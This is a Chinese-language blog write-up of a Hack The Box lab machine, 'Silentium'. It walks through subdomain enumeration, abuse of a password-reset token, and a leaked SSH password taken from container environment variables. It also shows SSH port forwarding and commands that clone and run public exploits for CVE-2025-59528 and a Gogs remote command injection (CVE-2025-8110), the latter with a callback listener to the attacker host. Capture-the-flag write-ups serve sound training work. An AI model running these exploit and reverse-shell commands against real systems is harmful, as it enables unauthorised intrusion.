【渗透测试】HTB Season10 Silentium 全过程wp

Silentium

image-20260412165617970

信息收集

image-20260412165717042

扫一下子域名 扫到staging.silentium.htb

image-20260412180238764

我们抓个包试试

image-20260413192823144

image-20260413192851534

{"email":"ben@silentium.htb","password":"1"}

从报错信息看出,也就是说用户的邮箱是ben@silentium.htb

去抓一个忘记密码的包

image-20260413193033088

可以得到teamToken

image-20260413204609828

image-20260413204658867

这里密码随便设置Password123!

然后进行登录即可

image-20260413204739176

漏洞利用(CVE-2025-59528)

git clone https://github.com/AzureADTrent/CVE-2025-58434-59528.git

image-20260413205552411

image-20260413205622312

可以看到自己是在docker容器里

image-20260413205803979

我们看一下env有没有什么泄露的

image-20260413210401093

有个密码是r04D!!_R4ge我们ssh一下

ssh ben@10.129.197.47
r04D!!_R4ge

image-20260413210436637

提权

看一下监听的端口

image-20260413210657234

有服务开启了3001端口

代理出来

ssh -L 3001:127.0.0.1:3001 ben@10.129.197.47 

image-20260413211933993

我们注册一个看看

image-20260413212042877

漏洞利用(CVE-2025-8110)

CVE-2025-8110 Gogs远程命令注入漏洞绕过分析与复现-先知社区

git clone https://github.com/Ghxstsec/CVE-2025-8110.git

其中脚本要改一下username 和 token

image-20260413212852487

image-20260413212845482

python3 CVE-2025-8110-RCE.py -u http://127.0.0.1:3001 -lh 10.10.16.17 -lp 6666 -p 'chenzi123'

image-20260413212952051

image-20260413213059341

posted @ 2026-04-13 21:32  dynasty_chenzi  阅读(133)  评论(0)    收藏  举报
返回顶端